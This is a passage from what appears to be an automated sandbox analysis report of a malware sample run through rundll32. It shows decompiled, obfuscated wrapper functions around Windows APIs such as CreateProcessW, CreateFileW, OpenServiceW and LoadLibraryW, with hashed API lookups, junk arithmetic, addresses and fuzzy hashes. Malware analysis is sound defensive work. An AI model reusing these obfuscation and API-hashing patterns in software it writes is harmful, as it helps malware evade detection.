				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E048EFE29(_t49);
				_v32 = 0x534833;
				_v28 = 0;
				_v24 = 0;
				_v8 = 0x70adbe;
				_v8 = _v8 >> 5;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x1d11c356;
				_v8 = _v8 ^ 0x1f145645;
				_v20 = 0xecea8a;
				_v20 = _v20 | 0x5baa72b8;
				_v20 = _v20 ^ 0x5be1d11d;
				_v16 = 0x76217f;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 | 0xe98780dc;
				_v16 = _v16 ^ 0xe98c1e91;
				_v12 = 0xeb975;
				_v12 = _v12 ^ 0xd8138edb;
				_v12 = _v12 | 0x0b4171d5;
				_v12 = _v12 ^ 0xdb5d9300;
				E048DEB52(__ecx, __ecx, 0xb7160725, 0x75, 0xa2289af1);
				_t56 = CreateProcessW(_a52, _t60, 0, 0, _a24, 0, 0, 0, _a32, _a56); // executed
				return _t56;
			}

0x048f2c2c
0x048f2c31
0x048f2c33
0x048f2c36
0x048f2c37
0x048f2c3a
0x048f2c3d
0x048f2c3e
0x048f2c41
0x048f2c44
0x048f2c47
0x048f2c4a
0x048f2c4b
0x048f2c4e
0x048f2c4f
0x048f2c51
0x048f2c52
0x048f2c57
0x048f2c61
0x048f2c64
0x048f2c67
0x048f2c6e
0x048f2c72
0x048f2c76
0x048f2c7d
0x048f2c84
0x048f2c8b
0x048f2c92
0x048f2c99
0x048f2ca0
0x048f2ca4
0x048f2cab
0x048f2cb2
0x048f2cb9
0x048f2cc0
0x048f2cc7
0x048f2ce8
0x048f2d02
0x048f2d09

APIs

CreateProcessW.KERNEL32(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 048F2D02

Strings

3HS, xrefs: 048F2C57

Memory Dump Source

Source File: 00000005.00000002.658328602.00000000048D1000.00000020.00000001.sdmp, Offset: 048D0000, based on PE: true

Associated: 00000005.00000002.658323148.00000000048D0000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.658353407.00000000048F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_48d0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: 3HS
API String ID: 963392458-330188696
Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction ID: 77d3115ebb918c8003daf379369c2e2b2a70ef29a904057d2c39be540e181953
Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction Fuzzy Hash: 4321F372800248BBDF159F96DC0ACDFBFB9EF85704F108188F915A2220D3B59A24DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 048F45CA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E048F45CA(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24, intOrPtr _a28, intOrPtr _a32, long _a36, intOrPtr _a40, long _a44, long _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t51;
				void* _t60;
				WCHAR* _t64;

				_push(_a48);
				_t64 = __ecx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E048EFE29(_t51);
				_v28 = 0x204d4f;
				_v24 = 0;
				_v20 = 0xd27984;
				_v20 = _v20 | 0x43788b11;
				_v20 = _v20 ^ 0x43f3df42;
				_v16 = 0xf976f1;
				_v16 = _v16 + 0xffff3d74;
				_v16 = _v16 | 0xfc5c4419;
				_v16 = _v16 ^ 0xfcfdb6fc;
				_v12 = 0xb7df7c;
				_v12 = _v12 + 0xffff3658;
				_v12 = _v12 * 0x13;
				_v12 = _v12 ^ 0x1f30f970;
				_v12 = _v12 ^ 0x12ab006a;
				_v8 = 0x8ba8ca;
				_v8 = _v8 | 0x62aa166a;
				_v8 = _v8 + 0xa2f6;
				_v8 = _v8 * 0x55;
				_v8 = _v8 ^ 0xc33acf6c;
				E048DEB52(__ecx, __ecx, 0xbc17bbde, 0x19f, 0xa2289af1);
				_t60 = CreateFileW(_t64, _a24, _a48, 0, _a44, _a36, 0); // executed
				return _t60;
			}

0x048f45d2
0x048f45d7
0x048f45d9
0x048f45dc
0x048f45df
0x048f45e2
0x048f45e5
0x048f45e8
0x048f45eb
0x048f45ee
0x048f45f1
0x048f45f4
0x048f45f5
0x048f45f7
0x048f45f8
0x048f45fd
0x048f4607
0x048f460a
0x048f4611
0x048f4618
0x048f461f
0x048f4626
0x048f462d
0x048f4634
0x048f463b
0x048f4642
0x048f465d
0x048f4660
0x048f4667
0x048f466e
0x048f4675
0x048f467c
0x048f4688
0x048f468b
0x048f469e
0x048f46b5
0x048f46bc

APIs

CreateFileW.KERNEL32(?,00000057,?,00000000,?,?,00000000), ref: 048F46B5

Strings

OM , xrefs: 048F45FD

Memory Dump Source

Source File: 00000005.00000002.658328602.00000000048D1000.00000020.00000001.sdmp, Offset: 048D0000, based on PE: true

Associated: 00000005.00000002.658323148.00000000048D0000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.658353407.00000000048F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_48d0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: OM
API String ID: 823142352-4198367855
Opcode ID: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction ID: a84880e55b0968ba8becb464158beb8b5ab508778aa3edb52ca8e9265e6f22ef
Opcode Fuzzy Hash: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction Fuzzy Hash: 9221EE72801249BBCF05DFA9CD45CDEBFB5EF89304F508199FA14A6220D3768A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 048F44FF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E048F44FF(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				intOrPtr* _t57;
				void* _t58;
				signed int _t60;
				signed int _t61;

				E048EFE29(_t47);
				_v20 = 0xa68a31;
				_t60 = 0x6d;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x00000260;
				_v16 = 0xfa9629;
				_v16 = _v16 + 0x734b;
				_v16 = _v16 ^ 0x638d356d;
				_v16 = _v16 ^ 0x637ea9c8;
				_v8 = 0x3f26ab;
				_v8 = _v8 ^ 0xcdd207a4;
				_v8 = _v8 ^ 0xb6eb62c4;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x0005a548;
				_v12 = 0xe291fe;
				_t61 = 0x24;
				_v12 = _v12 / _t61;
				_v12 = _v12 + 0x3d74;
				_v12 = _v12 ^ 0x00095158;
				_t57 = E048DEB52(_t61, _t61, 0x418e972c, 0x54, 0xa2289af1);
				_t58 =  *_t57(_a24, 0, _a20, 0x28, __ecx, __edx, 0, _a8, 0x28, _a16, _a20, _a24); // executed
				return _t58;
			}

0x048f4517
0x048f451c
0x048f452d
0x048f4532
0x048f4537
0x048f453e
0x048f4545
0x048f454c
0x048f4553
0x048f455a
0x048f4561
0x048f4568
0x048f456f
0x048f4573
0x048f457a
0x048f4584
0x048f458c
0x048f458f
0x048f4596
0x048f45b2
0x048f45c4
0x048f45c9

APIs

SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 048F45C4

Strings

XQ, xrefs: 048F4596

Memory Dump Source

Source File: 00000005.00000002.658328602.00000000048D1000.00000020.00000001.sdmp, Offset: 048D0000, based on PE: true

Associated: 00000005.00000002.658323148.00000000048D0000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.658353407.00000000048F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_48d0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID: XQ
API String ID: 3935143524-1200779947
Opcode ID: 81dfb277e86e3c1fe3069d107eacbb6aa7e5857e87f0bf20d0672193a35411da
Instruction ID: 9640d80785a67b749099262db468b20248d6bf100f91471f6c0cc61849176561
Opcode Fuzzy Hash: 81dfb277e86e3c1fe3069d107eacbb6aa7e5857e87f0bf20d0672193a35411da
Instruction Fuzzy Hash: 7D213B71D4020DFBEF04CFA5DC4AAAEBBB1EF54704F108589B910A6290D3F59A649F40

Uniqueness

Uniqueness Score: -1.00%

Function 048DEE62, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
serviceCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E048DEE62(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16, short* _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t34;
				void* _t41;
				void* _t44;

				_push(_a20);
				_t44 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E048EFE29(_t34);
				_v20 = 0xea751a;
				_v20 = _v20 | 0xe9b69993;
				_v20 = _v20 ^ 0xe9f29d6b;
				_v16 = 0x605393;
				_v16 = _v16 | 0xcc974431;
				_v16 = _v16 ^ 0xccf8b40a;
				_v12 = 0x102a1a;
				_v12 = _v12 + 0xcb09;
				_v12 = _v12 ^ 0x001131dd;
				_v8 = 0x570378;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0xef617e60;
				_v8 = _v8 ^ 0xef696bf9;
				E048DEB52(__ecx, __ecx, 0x5c98ffad, 5, 0x1f76e49f);
				_t41 = OpenServiceW(_t44, _a20, _a16); // executed
				return _t41;
			}

0x048dee69
0x048dee6c
0x048dee6e
0x048dee71
0x048dee74
0x048dee77
0x048dee7a
0x048dee7b
0x048dee7c
0x048dee81
0x048dee8b
0x048dee92
0x048dee99
0x048deea0
0x048deea7
0x048deeae
0x048deeb5
0x048deebc
0x048deec3
0x048deeca
0x048deece
0x048deed5
0x048deef6
0x048def05
0x048def0b

APIs

OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 048DEF05

Strings

`~a, xrefs: 048DEECE

Memory Dump Source

Source File: 00000005.00000002.658328602.00000000048D1000.00000020.00000001.sdmp, Offset: 048D0000, based on PE: true

Associated: 00000005.00000002.658323148.00000000048D0000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.658353407.00000000048F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_48d0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: `~a
API String ID: 3098006287-142445290
Opcode ID: 6383736253cef5703bc9a023e52ac128717e5205db758edbe98fcd92a09a10c3
Instruction ID: 4dd91e3d518e1aeb4f71e931ec84ae856f2aa59f4745c5a1fb23ce0844b37962
Opcode Fuzzy Hash: 6383736253cef5703bc9a023e52ac128717e5205db758edbe98fcd92a09a10c3
Instruction Fuzzy Hash: 0C112575C01218FBDF08DFA5DD0A8DEBFB5EF04314F108988F91566261D3B59A20AF91

Uniqueness

Uniqueness Score: -1.00%

Function 048E648A, Relevance: 1.6, APIs: 1, Instructions: 50
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E048E648A(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, long _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				void* _t49;
				long _t52;

				_push(_a16);
				_t52 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E048EFE29(_t41);
				_v12 = 0x3cd3f;
				_v12 = _v12 << 3;
				_v12 = _v12 | 0xc677f757;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0188bcff;
				_v20 = 0x40fc9e;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x040306b1;
				_v16 = 0x159e9f;
				_v16 = _v16 + 0xffffd0d5;
				_v16 = _v16 * 0x33;
				_v16 = _v16 ^ 0x04433238;
				_v8 = 0x8a430d;
				_v8 = _v8 + 0xffffdfbc;
				_v8 = _v8 | 0x5356d001;
				_v8 = _v8 + 0x638e;
				_v8 = _v8 ^ 0x53d0144a;
				E048DEB52(__ecx, __ecx, 0x958aafc8, 0x1c3, 0xa2289af1);
				_t49 = RtlAllocateHeap(_a12, _a16, _t52); // executed
				return _t49;
			}

0x048e6491
0x048e6494
0x048e6496
0x048e6499
0x048e649c
0x048e64a0
0x048e64a1
0x048e64a6
0x048e64b0
0x048e64b4
0x048e64bb
0x048e64bf
0x048e64c6
0x048e64cd
0x048e64d1
0x048e64d8
0x048e64df
0x048e64fa
0x048e64fd
0x048e6504
0x048e650b
0x048e6512
0x048e6519
0x048e6520
0x048e6534
0x048e6543
0x048e6549

APIs

RtlAllocateHeap.NTDLL(040306B1,?,ED94606E,?,?,?,?,?,?,?,?,?,?,?), ref: 048E6543

Memory Dump Source

Source File: 00000005.00000002.658328602.00000000048D1000.00000020.00000001.sdmp, Offset: 048D0000, based on PE: true

Associated: 00000005.00000002.658323148.00000000048D0000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.658353407.00000000048F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_48d0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction ID: 8a8e84c84fba7311e455465d1b5aa60198dcfde6166343e94616e22581e85b6a
Opcode Fuzzy Hash: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction Fuzzy Hash: DE11C2B2C0121DBBDF05DFA5D9498DEBBB4EB04314F108598E911A6250E3B59B149F91

Uniqueness

Uniqueness Score: -1.00%

Function 048EE8B6, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E048EE8B6(void* __ecx, void* __edx, intOrPtr _a4, int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t29;
				void* _t37;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E048EFE29(_t29);
				_v20 = 0xc8e76b;
				_v20 = _v20 | 0x270203a1;
				_v20 = _v20 ^ 0x27c97096;
				_v16 = 0x55aebc;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00171a80;
				_v12 = 0xfad6fe;
				_v12 = _v12 ^ 0xd14a4d1d;
				_v12 = _v12 ^ 0xd1b10da7;
				_v8 = 0x428060;
				_v8 = _v8 * 0x54;
				_v8 = _v8 ^ 0x15de1a76;
				E048DEB52(__ecx, __ecx, 0x3c0b385, 0x1bc, 0x1f76e49f);
				_t37 = OpenSCManagerW(0, 0, _a12); // executed
				return _t37;
			}

0x048ee8bd
0x048ee8c2
0x048ee8c5
0x048ee8c6
0x048ee8ca
0x048ee8cb
0x048ee8d0
0x048ee8da
0x048ee8e1
0x048ee8e8
0x048ee8ef
0x048ee8f3
0x048ee8fa
0x048ee901
0x048ee908
0x048ee90f
0x048ee92a
0x048ee92d
0x048ee941
0x048ee94e
0x048ee954

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,27C97096,?,?,?,?,?,?,?,?,?,?,?), ref: 048EE94E

Memory Dump Source

Source File: 00000005.00000002.658328602.00000000048D1000.00000020.00000001.sdmp, Offset: 048D0000, based on PE: true

Associated: 00000005.00000002.658323148.00000000048D0000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.658353407.00000000048F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_48d0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction ID: e3c51c8af147ff682fd44d871796303556e745ed7e2b5203b46089069c66d7c2
Opcode Fuzzy Hash: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction Fuzzy Hash: 1C11157190221DFB9B04EFA999468EEBFB4EF04308F108588E925B6211D3B19B149B91

Uniqueness

Uniqueness Score: -1.00%

Function 048ED11A, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E048ED11A() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t39;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x78f5c7;
				_v32 = 0xa12bb9;
				_v28 = 0x4eca09;
				_v8 = 0x8b256f;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x4a7d0011;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00073d60;
				_v20 = 0x1e549a;
				_v20 = _v20 + 0xffffad33;
				_v20 = _v20 ^ 0x00134b4f;
				_v16 = 0x8dd9dd;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x0460bc3c;
				_v12 = 0x358059;
				_v12 = _v12 + 0xb97b;
				_v12 = _v12 ^ 0x003502df;
				E048DEB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
				ExitProcess(0);
			}

0x048ed120
0x048ed124
0x048ed12b
0x048ed132
0x048ed139
0x048ed140
0x048ed144
0x048ed14b
0x048ed14f
0x048ed156
0x048ed15d
0x048ed164
0x048ed16b
0x048ed172
0x048ed176
0x048ed17d
0x048ed184
0x048ed18b
0x048ed1ac
0x048ed1b6

APIs

ExitProcess.KERNEL32(00000000), ref: 048ED1B6

Memory Dump Source

Source File: 00000005.00000002.658328602.00000000048D1000.00000020.00000001.sdmp, Offset: 048D0000, based on PE: true

Associated: 00000005.00000002.658323148.00000000048D0000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.658353407.00000000048F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_48d0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction ID: 2d4c3b792537e0462730631d00906b13047fbe3007050e09ccea5afd084a9c21
Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction Fuzzy Hash: 771112B1C4030CEBDB44DFE5D94A6DEFBB0EB00708F108588D521B6240D3B89B489F91

Uniqueness

Uniqueness Score: -1.00%

Function 048F061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E048F061D(void* __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				int _t53;
				WCHAR* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E048EFE29(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xcd60b7;
				_v12 = 0x7257ab;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0x8f69;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x410f7a13;
				_v8 = 0x7b4696;
				_v8 = _v8 + 0xffff4950;
				_v8 = _v8 | 0x2a0f624b;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xa0f3ec54;
				_v20 = 0x8a2161;
				_v20 = _v20 + 0xffff45ea;
				_v20 = _v20 ^ 0x1b6c7fa6;
				_v20 = _v20 ^ 0x1be8dede;
				_v16 = 0xdcc12a;
				_v16 = _v16 + 0xb9f4;
				_v16 = _v16 + 0xffffcfef;
				_v16 = _v16 ^ 0x00d9de04;
				E048DEB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
				_t53 = lstrcmpiW(_a4, _t56); // executed
				return _t53;
			}

0x048f0624
0x048f0627
0x048f0629
0x048f062c
0x048f062f
0x048f0630
0x048f0631
0x048f0636
0x048f063d
0x048f0644
0x048f064b
0x048f064f
0x048f0667
0x048f066a
0x048f0671
0x048f0678
0x048f067f
0x048f068b
0x048f068e
0x048f0695
0x048f069c
0x048f06a3
0x048f06aa
0x048f06b1
0x048f06b8
0x048f06bf
0x048f06c6
0x048f06d9
0x048f06e5
0x048f06eb

APIs

lstrcmpiW.KERNEL32(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 048F06E5

Memory Dump Source

Source File: 00000005.00000002.658328602.00000000048D1000.00000020.00000001.sdmp, Offset: 048D0000, based on PE: true

Associated: 00000005.00000002.658323148.00000000048D0000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.658353407.00000000048F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_48d0000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: fbe9e9447c351286e099a278134faa972f576e3d54eec5c2ffa0f49df98c9385
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: 962132B1C01209ABCF04DFA9D94999EBFB4FB10354F108298E529A6251D3B49B00CB90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6728 Parent PID: 5104 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	14%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1074
Total number of Limit Nodes:	12

Executed Functions

Function 008E52B9, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E008E52B9(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t47;
				struct HINSTANCE__* _t59;
				signed int _t61;
				signed int _t62;
				WCHAR* _t68;

				_push(_a12);
				_t68 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E008FFE29(_t47);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x68392e;
				_v16 = 0xf5950b;
				_v16 = _v16 ^ 0xb3325752;
				_v16 = _v16 ^ 0xe58473b2;
				_v16 = _v16 ^ 0x56462a2c;
				_v8 = 0x3988bb;
				_t61 = 0x3a;
				_v8 = _v8 / _t61;
				_v8 = _v8 + 0xf338;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x0035ea14;
				_v12 = 0xe53120;
				_v12 = _v12 ^ 0xa236e8c8;
				_t62 = 0x62;
				_v12 = _v12 / _t62;
				_v12 = _v12 ^ 0x01ab7b97;
				_v20 = 0x973198;
				_v20 = _v20 * 0x60;
				_v20 = _v20 ^ 0x38bce55b;
				E008EEB52(_t62, _t62, 0xeec842c3, 0xab, 0xa2289af1);
				_t59 = LoadLibraryW(_t68); // executed
				return _t59;
			}

0x008e52c0
0x008e52c3
0x008e52c5
0x008e52c8
0x008e52cc
0x008e52cd
0x008e52d2
0x008e52d9
0x008e52e2
0x008e52e9
0x008e52f0
0x008e52f7
0x008e52fe
0x008e530a
0x008e530f
0x008e5314
0x008e531b
0x008e531f
0x008e5326
0x008e532d
0x008e5337
0x008e533f
0x008e5342
0x008e5349
0x008e5360
0x008e5363
0x008e5376
0x008e537f
0x008e5385

APIs

LoadLibraryW.KERNEL32 ref: 008E537F

Strings

1, xrefs: 008E5326
,*FV, xrefs: 008E52F7
.9h, xrefs: 008E52D9

Memory Dump Source

Source File: 00000007.00000002.658016233.00000000008E1000.00000020.00000001.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000007.00000002.658009382.00000000008E0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.658058923.0000000000906000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8e0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 1$,*FV$.9h
API String ID: 1029625771-1870595533
Opcode ID: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction ID: b526daf919b7aeea145465d24bdfd3368bef59f4a5bb95947e8b5b9b7d6c23dd
Opcode Fuzzy Hash: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction Fuzzy Hash: A42156B5D00208FBDF08DFA8D94A9EEBBB5FB41314F108198E915B6251D3B45B14DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00901538, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00901538(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t59;
				int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;

				_push(_a4);
				E008FFE29(_t59);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x73095a;
				_v28 = 0xd34a52;
				_v16 = 0xb3a153;
				_t77 = 0x73;
				_v16 = _v16 / _t77;
				_v16 = _v16 + 0x4fd2;
				_v16 = _v16 ^ 0xee3af97f;
				_v16 = _v16 ^ 0xee3510f4;
				_v20 = 0xee2064;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x88190a0a;
				_v12 = 0x72c7a5;
				_v12 = _v12 + 0x7839;
				_t78 = 0x77;
				_v12 = _v12 / _t78;
				_t79 = 0x76;
				_v12 = _v12 / _t79;
				_v12 = _v12 ^ 0x00040652;
				_v8 = 0x10c7fb;
				_t80 = 0x6c;
				_v8 = _v8 * 0x70;
				_v8 = _v8 << 8;
				_v8 = _v8 / _t80;
				_v8 = _v8 ^ 0x00c83f8f;
				E008EEB52(_t80, _t80, 0x2aa4bac1, 0x108, 0xa2289af1);
				_t75 = FindCloseChangeNotification(_a4); // executed
				return _t75;
			}

0x0090153e
0x00901543
0x00901548
0x0090154f
0x00901558
0x0090155f
0x0090156b
0x00901570
0x00901575
0x0090157c
0x00901583
0x0090158a
0x00901591
0x00901595
0x0090159c
0x009015a3
0x009015ad
0x009015b2
0x009015ba
0x009015bf
0x009015c4
0x009015cb
0x009015d6
0x009015e6
0x009015e9
0x009015f3
0x009015f6
0x0090160a
0x00901615
0x0090161a

APIs

FindCloseChangeNotification.KERNEL32(00040652), ref: 00901615

Strings

d , xrefs: 0090158A
Zs, xrefs: 0090154F

Memory Dump Source

Source File: 00000007.00000002.658016233.00000000008E1000.00000020.00000001.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000007.00000002.658009382.00000000008E0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.658058923.0000000000906000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID: Zs$d
API String ID: 2591292051-3879001491
Opcode ID: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction ID: 445a54da9725e28c018432ef4a0623bf6ac6d494e441c4d9e0783ffa6df2222b
Opcode Fuzzy Hash: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction Fuzzy Hash: 03212CB5D40209EBEB04DFA5D94A99DBBB1EB40314F10C099E614BB251D7B95B548F80

Uniqueness

Uniqueness Score: -1.00%

Function 008ED061, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E008ED061(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t69;

				_push(_a12);
				_t69 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E008FFE29(_t54);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xa62646;
				_v32 = 0x27199b;
				_v20 = 0x942c55;
				_v20 = _v20 | 0xf0368afe;
				_v20 = _v20 << 0xa;
				_v20 = _v20 ^ 0xfbcaf84d;
				_v20 = _v20 ^ 0x217d6c33;
				_v16 = 0xf28622;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 | 0xeb4a9877;
				_v16 = _v16 ^ 0x2aded5e4;
